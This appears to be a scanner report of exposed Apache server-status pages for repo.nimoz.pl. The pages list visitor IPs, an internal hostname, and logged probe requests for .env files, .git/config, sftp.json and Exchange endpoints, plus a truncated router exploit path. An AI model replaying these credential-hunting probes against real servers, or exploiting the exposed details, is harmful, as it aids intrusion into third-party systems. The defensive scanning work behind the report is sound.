/debug/default/view?panel=config HTTP/1.1 0-122325090/4/494_ 1.1602339211330.00.0659395.20 64.226.65.160http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-122325090/2/466_ 0.320271487660.00.0161.38 185.142.236.43h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-122325090/2/469_ 1.1602028239410.00.021477.10 64.226.65.160http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-122325090/3/458_ 0.70004518140.00.022566.02 64.226.65.160http/1.1 0-122325090/3/441_ 0.46006566480.00.01541.79 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-122325090/4/459_ 0.70102501050.00.00442.59 64.226.65.160http/1.1 0-122325090/1/483_ 0.301048400220.00.002663.87 64.226.65.160http/1.1 0-122325090/9/723_ 0.8113214034570.00.067256.41 64.226.65.160http/1.1 0-122325090/3/497_ 0.9112515013720.00.03133763.78 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-122325090/8/513_ 0.70102912510.00.02411.01 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-122325090/2/443_ 1.0912621870200.00.03115446.04 64.226.65.160http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-122325090/3/424_ 0.8911206867440.00.0363974.97 185.142.236.43http/1.1 0-122325090/4/510_ 0.9113125448430.00.042800.31 67.70.237.204http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-122325100/1/167_ 0.0500370320.00.012.53 64.226.65.160http/1.1 1-122325100/0/156_ 0.0000144400.00.001.61 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-122325100/1/131_ 0.04026174540.00.025.17 34.234.97.48http/1.1 1-122325100/1/205_ 0.1810412020.00.003.73 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-122325100/0/1907_ 0.001121962215430.00.0028259.18 185.142.236.43http/1.1 1-122325100/0/162_ 0.00113202877330.00.002.08 185.142.236.43http/1.1 1-122325100/3/140_ 0.441160166460.00.032.14 185.142.236.43http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-122325100/0/149_ 0.0011924443200.00.0067.42 72.53.198.100http/1.1 1-122325100/2/138_ 0.42122273678760.00.01346.01 185.142.236.43http/1.1repo.nimoz.pl:443GET /sitemap.xml HTTP/1.1 1-122325100/1/185_ 0.1713323249910.00.023.34 185.142.236.43http/1.1repo.nimoz.pl:443\n 1-122325100/1/129_ 0.021340474490.00.0076.92 185.142.236.43http/1.1 1-122325100/1/175_ 0.161352756850.00.0160.05 185.142.236.43http/1.1 1-122325100/1/153_ 0.021350252670.00.002.46 185.142.236.43http/1.1 1-122325100/1/152_ 0.151350235570.00.001.68 185.142.236.43http/1.1 1-122325100/1/150_ 0.0213603617240.00.00345.98 185.142.236.43h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-122325100/0/125_ 0.001340422980.00.0086.37 185.142.236.43http/1.1 1-122325100/2/198_ 0.1411126925333810.00.472.66 185.242.226.88http/1.1 1-122325100/1/169_ 0.0211127248031940.00.01896.84 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-122325100/1/147_ 0.071156022190320.00.021.67 159.69.1.179http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-122325100/2/147_ 0.381156023156040.00.031.52 146.70.72.174http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-122325100/0/175_ 0.0013498225280000.00.00426.94 13.91.182.218http/1.1 1-122325100/1/188_ 0.0602341342900.00.012038.14 13.91.182.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-122325100/1/158_ 0.49024141790.00.011.41 64.226.65.160http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-122325100/2/258_ 0.4902622038510.00.022891.42 64.226.65.160http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-122325100/2/171_ 0.49021835960.00.0381.30 64.226.65.160http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 2-120-0/0/800. 0.00166539018049910.00.00903.45 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 2-120-0/0/679. 0.00166539023136400.00.006317.52 87.121.69.52http/1.1 2-120-0/0/592. 0.0016653914227150.00.00271.36 185.216.71.4http/1.1 2-120-0/0/590. 0.0016653909
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4481fc2f7b8
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 26-May-2024 23:53:37 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 122 Parent Server MPM Generation: 121 Server uptime: 121 days 13 hours 47 minutes 34 seconds Server load: 0.00 0.00 0.00 Total accesses: 41610 - Total Traffic: 750.3 GB - Total Duration: 118579280 CPU Usage: u58.21 s138.31 cu995.25 cs688.61 - .0179% CPU load .00396 requests/sec - 74.9 kB/second - 18.5 MB/request - 2849.78 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 029384no0yes124000 129385no0yes025000 Sum200 149000 ______________W___________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-121293840/7/431_ 1.21249422826100.00.03131.33 51.15.114.30http/1.1 0-121293840/11/473_ 1.221261058830.00.606.08 185.136.193.46http/1.1 0-121293840/6/484_ 1.3812978240410.00.05132866.27 139.162.141.82http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-121293840/7/1501_ 1.3210189840950.00.0324865.52 139.162.141.82h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/4/455_ 1.221258765670.00.051437.73 139.162.141.82h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/5/502_ 1.3012941363870.00.052234.30 139.162.141.82http/1.1 0-121293840/4/409_ 1.30005532190.00.0334602.39 162.243.134.28http/1.1vm-repo-prd.nimoz.local:80GET /druid/index.html HTTP/1.1 0-121293840/9/522_ 1.313071032368140.00.063141.50 87.121.69.52http/1.1vm-repo-prd.nimoz.local:80CONNECT google.com:443 HTTP/1.1 0-121293840/2/461_ 0.7730721811683800.00.022054.14 43.135.123.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/8/482_ 1.31307604965100.00.08365.53 155.133.23.58http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-121293840/3/465_ 1.353077023520480.00.0237040.66 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-121293840/4/434_ 0.693076163985350.00.04348.46 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-121293840/10/490_ 1.273130039211010.00.0859395.14 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-121293840/1/463_ 1.31313001487160.00.0061.36 198.235.24.244http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-121293840/5/466W 1.350028239180.00.051477.08 139.162.141.82http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-121293840/7/455_ 1.300264517860.00.072566.00 103.149.192.224http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-121293840/10/438_ 1.450226566470.00.04541.79 139.162.141.82http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-121293840/6/455_ 1.450252501050.00.06442.59 139.162.141.82http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-121293840/6/482_ 1.4502148400210.00.052663.87 139.162.141.82http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-121293840/6/714_ 1.4502314033410.00.067256.35 139.162.141.82http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-121293840/4/494_ 0.920015013160.00.03133763.75 139.162.141.82http/1.1 0-121293840/5/505_ 1.330332912210.00.05410.99 139.162.141.82h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/6/441_ 1.2412021869660.00.02115446.01 139.162.141.82h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/2/421_ 0.641296866870.00.0163974.94 139.162.141.82http/1.1 0-121293840/7/506_ 1.321025447640.00.062800.27 139.162.141.82http/1.1 1-121293850/4/166_ 0.25178180370320.00.032.52 118.193.47.212http/1.1vm-repo-prd.nimoz.local:80GET /core/js/backgroundjobs.js?v=c03a1674-3 HTTP/1.1 1-121293850/4/156_ 0.40178230144400.00.031.61 43.135.123.64http/1.1repo.nimoz.pl:443POST /nvidia_license_upd.php HTTP/1.1 1-121293850/3/129_ 0.391782625174080.00.045.15 43.135.123.64http/1.1repo.nimoz.pl:443GET /wh/glass.php HTTP/1.1 1-121293850/4/204_ 0.311781621412020.00.043.73 43.135.123.64http/1.1repo.nimoz.pl:443POST //api/attach HTTP/1.1 1-121293850/3/1907_ 0.4701962215430.00.0328259.18 139.162.141.82http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-121293850/3/162_ 0.380202877330.00.032.08 43.135.123.64http/1.1repo.nimoz.pl:443GET /new/login HTTP/1.1 1-121293850/2/137_ 0.121781829166240.00.022.11 43.135.123.64http/1.1 1-121293850/1/149_ 0.47024443200.00.0167.42 139.162.141.82http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-121293850/3/136_ 0.470293678480.00.04345.99 139.162.141.82http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-121293850/0/184_ 0.000702249680.00.003.32 139.162.141.82http/1.1 1-121293850/1/128_ 0.04123474490.00.0176.92 139.162.141.82h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/1/174_ 0.16313023756820.00.0160.04 43.135.123.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/0/152_ 0.0031301032252670.00.002.46 43.135.123.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/2/151_ 0.1531300235560.00.011.67 167.71.0.228http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/2/149_ 0.323130203617240.00.02345.98 167.71.0.228http/1.1 1-121293850/2/125_ 0.4431300422980.00.0186.37 167.71.0.228http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-121293850/2/196_ 0.32535625324560.00.032.20 43.135.123.64http/1.1repo.nimoz.pl:443GET /c/msdownload/update/software/update/2021/11/6632de33-96744 1-121293850/1/168_ 0.22535608031690.00.01896.82 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/0/146_ 0.0017813896190100.00.001.65 45.156.128.22http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-121293850/2/145_ 0.441781325155570.00.011.49 43.135.123.64http/1.1repo.nimoz.pl:443GET /fw6I HTTP/1.1 1-121293850/2/175_ 0.4217816225280000.00.02426.94 43.135.123.64http/1.1repo.nimoz.pl:443GET /c/msdownload/update/software/update/2021/11/6632de33-96744 1-121293850/2/187_ 0.29178182541342670.00.012038.13 43.135.123.64http/1.1repo.nimoz.pl:443GET /wh/glass.php HTTP/1.1 1-121293850/2/157_ 0.411781923141540.00.021.40 43.135.123.64http/1.1repo.nimoz.pl:443POST //api/attach HTTP/1.1 1-121293850/2/256_ 0.3702122038240.00.032891.39 142.93.65.94http/1.1 1-121293850/0/168_ 0.001782631835190.00.0081.26 185.242.226.75http/1.1 2-120-0/0/800. 0.008601
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448668525bb
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 26-May-2024 00:42:36 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 122 Parent Server MPM Generation: 121 Server uptime: 120 days 14 hours 36 minutes 33 seconds Server load: 0.08 0.02 0.01 Total accesses: 41426 - Total Traffic: 750.3 GB - Total Duration: 118575086 CPU Usage: u56.08 s137.08 cu995.25 cs688.61 - .018% CPU load .00398 requests/sec - 75.5 kB/second - 18.5 MB/request - 2862.33 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 029384no0yes124000 129385no0yes025000 Sum200 149000 ____________W_____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-121293840/1/425_ 0.0021530825650.00.00131.30 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-121293840/0/462_ 0.00214811511050650.00.005.48 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-121293840/0/478_ 0.002148115278239330.00.00132866.22 185.216.71.4http/1.1 0-121293840/0/1494_ 0.0021120189840430.00.0024865.49 20.118.64.67http/1.1 0-121293840/1/452_ 0.017318765140.00.011437.69 164.92.107.174http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-121293840/0/497_ 0.007126241363010.00.002234.25 52.206.120.31http/1.1 0-121293840/0/405_ 0.00255012175531530.00.0034602.36 185.242.226.10http/1.1 0-121293840/0/513_ 0.002550032366470.00.003141.44 185.242.226.10http/1.1repo.nimoz.pl:443GET /core/img/favicon-touch.png HTTP/1.1 0-121293840/0/459_ 0.002550127011683420.00.002054.12 185.242.226.10http/1.1 0-121293840/0/474_ 0.00255004963640.00.00365.45 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 0-121293840/0/462_ 0.002550125023520100.00.0037040.64 83.147.52.42http/1.1repo.nimoz.pl:443GET /themes/.env HTTP/1.1 0-121293840/0/430_ 0.0025509483984500.00.00348.42 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-121293840/0/480W 0.000039209140.00.0059395.07 164.92.107.174http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-121293840/0/462_ 0.0008891487160.00.0061.36 83.147.52.42http/1.1repo.nimoz.pl:443GET /log/.env HTTP/1.1 0-121293840/0/461_ 0.00089428238510.00.001477.03 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-121293840/1/449_ 0.091274516270.00.012565.94 164.92.107.174http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-121293840/1/429_ 0.092246566050.00.01541.76 164.92.107.174http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-121293840/1/450_ 0.083242500290.00.01442.55 164.92.107.174http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-121293840/0/476_ 0.004048399490.00.002663.82 164.92.107.174http/1.1 0-121293840/0/708_ 0.0042914030740.00.007256.29 164.92.107.174h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/0/490_ 0.00598515010960.00.00133763.72 164.92.107.174http/1.1 0-121293840/0/500_ 0.0059342911310.00.00410.94 164.92.107.174http/1.1 0-121293840/0/435_ 0.006021869450.00.00115445.99 164.92.107.174http/1.1 0-121293840/0/419_ 0.00606866570.00.0063974.93 164.92.107.174h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-121293840/0/499_ 0.0062925446610.00.002800.22 164.92.107.174h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/0/162_ 0.002550763369380.00.002.49 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/0/152_ 0.0025500142220.00.001.57 185.242.226.10http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 1-121293850/0/126_ 0.0025500172470.00.005.11 64.188.23.30http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 1-121293850/0/200_ 0.002550818410440.00.003.68 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/0/1904_ 0.00255080462214970.00.0028259.15 64.188.23.30http/1.1 1-121293850/0/159_ 0.0025508482876890.00.002.06 185.242.226.10http/1.1 1-121293850/0/135_ 0.002550768165720.00.002.09 80.66.83.48http/1.1 1-121293850/0/148_ 0.002550771442960.00.0067.41 83.147.52.42http/1.1repo.nimoz.pl:443GET /blog/wp-content/themes/.env HTTP/1.1 1-121293850/0/133_ 0.0025507463677800.00.00345.96 83.147.52.42http/1.1repo.nimoz.pl:443GET /blog/.env HTTP/1.1 1-121293850/0/184_ 0.002550702249680.00.003.32 83.147.52.42http/1.1repo.nimoz.pl:443GET /bin/.env HTTP/1.1 1-121293850/1/128_ 0.04023474490.00.0176.92 164.92.107.174http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-121293850/0/173_ 0.001988756580.00.0060.02 83.147.52.42http/1.1repo.nimoz.pl:443GET /images/.env HTTP/1.1 1-121293850/0/152_ 0.0011032252670.00.002.46 52.206.120.31http/1.1 1-121293850/1/150_ 0.04122235560.00.011.67 164.92.107.174http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-121293850/1/148_ 0.042213617040.00.01345.96 164.92.107.174http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-121293850/0/123_ 0.003943422610.00.0086.36 185.242.226.10http/1.1 1-121293850/1/195_ 0.04324324300.00.022.18 164.92.107.174http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-121293850/0/167_ 0.0049428031690.00.00896.82 164.92.107.174http/1.1 1-121293850/0/146_ 0.005896190100.00.001.65 164.92.107.174h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/0/143_ 0.007901155320.00.001.48 164.92.107.174h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-121293850/0/173_ 0.0021529015279760.00.00426.92 162.216.149.73http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/0/185_ 0.00215390041342410.00.002038.11 52.206.120.31http/1.1 1-121293850/0/155_ 0.002153857141310.00.001.38 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-121293850/0/254_ 0.0025502222037350.00.002891.37 185.242.226.10http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-121293850/0/168_ 0.00255031835190.00.0081.26 185.242.226.10http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-120-0/0/800. 0.002550018049910.00.00903.45 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 2-120-0/0/679. 0.002550023136400.00.006317.52 87.121.69.52http/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448c8c76bc6
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 24-May-2024 23:41:32 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 120 Parent Server MPM Generation: 119 Server uptime: 119 days 13 hours 35 minutes 29 seconds Server load: 0.00 0.00 0.00 Total accesses: 41186 - Total Traffic: 750.3 GB - Total Duration: 118485901 CPU Usage: u57.14 s136.03 cu992.34 cs688.39 - .0181% CPU load .00399 requests/sec - 76.2 kB/second - 18.7 MB/request - 2876.85 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 023164no0yes025000 123165no0yes124000 225486no0yes025000 Sum300 174000 ____________________________W___________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-119231640/6/420_ 0.748555865806880.00.06131.25 83.147.52.37http/1.1repo.nimoz.pl:443GET /script/.git/config HTTP/1.1 0-119231640/7/460_ 0.818554171032790.00.065.45 178.62.216.118http/1.1repo.nimoz.pl:443GET /ews/ews/ HTTP/1.1 0-119231640/5/474_ 0.74955087278220740.00.04132866.17 83.147.52.37http/1.1repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-119231640/7/1489_ 0.85022189821840.00.0724865.46 157.245.113.227http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-119231640/7/446_ 0.850178746420.00.051437.62 157.245.113.227http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-119231640/4/494_ 0.74086341344840.00.032234.21 87.236.176.132h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-119231640/5/402_ 0.837183235514110.00.0534602.33 143.198.161.42http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-119231640/3/509_ 0.74718368232348530.00.023141.40 88.80.188.115http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-119231640/5/455_ 0.74467511665710.00.032054.07 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-119231640/9/470_ 0.828553174949130.00.06365.41 178.62.216.118http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscoverrs/ HTTP/1.1 0-119231640/6/459_ 0.74855386923503620.00.0537040.61 83.147.52.37http/1.1repo.nimoz.pl:443GET /images/.git/config HTTP/1.1 0-119231640/4/427_ 0.7428983971600.00.04348.39 157.245.113.227http/1.1 0-119231640/8/477_ 0.8185531739193760.00.0659395.03 178.62.216.118http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscovers/ HTTP/1.1 0-119231640/11/458_ 0.798555251474300.00.1161.30 178.62.216.118http/1.1repo.nimoz.pl:443GET /ews/exchanges/ HTTP/1.1 0-119231640/3/456_ 0.8085542428226610.00.051477.00 178.62.216.118http/1.1repo.nimoz.pl:443GET /ews/exchange/ HTTP/1.1 0-119231640/4/444_ 0.851184503280.00.032565.89 157.245.113.227http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-119231640/5/425_ 0.7495504706553930.00.02541.71 83.147.52.37http/1.1repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-119231640/7/443_ 0.8365502487380.00.05442.47 64.188.23.30http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 0-119231640/5/471_ 0.74855461748386900.00.042663.77 83.147.52.37http/1.1repo.nimoz.pl:443GET /config/.git/config HTTP/1.1 0-119231640/8/705_ 0.831672014018530.00.047256.24 161.35.190.246http/1.1vm-repo-prd.nimoz.local:80GET /Temporary_Listen_Addresses HTTP/1.1 0-119231640/3/486_ 0.74167284514998700.00.03133763.67 161.35.190.246http/1.1 0-119231640/5/496_ 0.7495504672900000.00.03410.91 83.147.52.37http/1.1repo.nimoz.pl:443GET /components/.git/config HTTP/1.1 0-119231640/7/433_ 0.7465590921862370.00.04115445.98 64.188.23.30http/1.1 0-119231640/5/414_ 0.7485536776848760.00.0263974.88 83.147.52.37http/1.1repo.nimoz.pl:443GET /css/.git/config HTTP/1.1 0-119231640/5/494_ 0.74855462825427340.00.032800.15 83.147.52.37http/1.1repo.nimoz.pl:443GET /content/.git/config HTTP/1.1 1-119231650/2/161_ 0.6930361750.00.022.48 157.245.113.227http/1.1 1-119231650/2/149_ 0.3840133950.00.011.54 143.198.161.42http/1.1 1-119231650/3/124_ 0.79121164230.00.045.09 157.245.113.227http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-119231650/3/197W 0.6900402010.00.033.66 157.245.113.227http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-119231650/2/1902_ 0.22499862206920.00.0228259.13 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-119231650/2/157_ 0.72168002868410.00.022.04 52.76.71.100http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-119231650/2/134_ 0.59017158030.00.032.07 178.62.216.118http/1.1repo.nimoz.pl:443GET /ews/autodiscovers/ HTTP/1.1 1-119231650/6/145_ 0.71223329434600.00.0467.37 51.158.154.254http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-119231650/4/132_ 0.222781213670330.00.04345.94 141.98.11.79http/1.1 1-119231650/2/181_ 0.60397919242150.00.033.29 178.62.216.118http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscover%20/ HTTP/1.1 1-119231650/2/125_ 0.224993457410.00.0376.88 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-119231650/4/170_ 0.726550743830.00.0459.99 64.188.23.30http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 1-119231650/4/151_ 0.24221327242350.00.052.45 88.80.188.115http/1.1 1-119231650/2/148_ 0.22655825225500.00.031.65 64.188.23.30http/1.1 1-119231650/3/145_ 0.734283606670.00.03345.92 157.245.113.227http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-119231650/4/121_ 0.79020412870.00.0586.33 157.245.113.227http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-119231650/3/191_ 0.223978865314360.00.052.13 172.168.41.58http/1.1 1-119231650/2/166_ 0.2134428022260.00.02896.80 157.245.113.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-119231650/2/144_ 0.6016800180930.00.011.63 143.198.161.42http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-119231650/4/141_ 0.79125145990.00.031.45 157.245.113.227http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-119231650/4/172_ 0.284241545270750.00.03426.90 143.198.161.42h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-119231650/2/182_ 0.5821841333100.00.032038.08 157.245.113.227http/1.1 1-119231650/2/152_ 0.57326132500.00.031.35 157.245.113.227http/1.1 1-119231650/3/251_ 0.383022028240.00.022891.32 157.245.113.227http/1.1 1-119231650/4/166_ 0.6927810826350.00.0381.24 141.98.11.79http/1.1vm-repo-prd.nimoz.local:80CONNECT google.com:443 HTTP/1.1 2-119
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44866b89193
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 23-May-2024 22:08:14 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 119 Parent Server MPM Generation: 118 Server uptime: 118 days 12 hours 2 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 40928 - Total Traffic: 750.3 GB - Total Duration: 118367407 CPU Usage: u56.93 s134.93 cu990.18 cs688.23 - .0183% CPU load .004 requests/sec - 76.8 kB/second - 18.8 MB/request - 2892.09 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 220052no0yes124000 320053no0yes025000 Sum200 149000 ..................................................___W__________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-116-0/0/414. 0.0016608529793820.00.00131.20 77.91.85.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116-0/0/453. 0.0016608501021200.00.005.39 84.54.51.37http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-116-0/0/469. 0.00166085078199420.00.00132866.13 185.224.128.43http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/1482. 0.001660850189808360.00.0024865.38 165.154.172.111http/1.1repo.nimoz.pl:443GET /core/js/dist/files_fileinfo.js?v=c03a1674-3 HTTP/1.1 0-116-0/0/439. 0.0016608508733960.00.001437.58 93.174.95.106http/1.1 0-116-0/0/490. 0.00166085041332430.00.002234.18 118.193.39.117h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-116-0/0/397. 0.0016608505506750.00.0034602.28 118.193.39.117http/1.1 0-116-0/0/506. 0.00166085032341700.00.003141.38 34.78.249.41http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-116-0/0/450. 0.00166085011658710.00.002054.04 118.193.39.117http/1.1 0-116-0/0/461. 0.0016608504938460.00.00365.34 118.193.39.117http/1.1 0-116-0/0/453. 0.001660852123492930.00.0037040.56 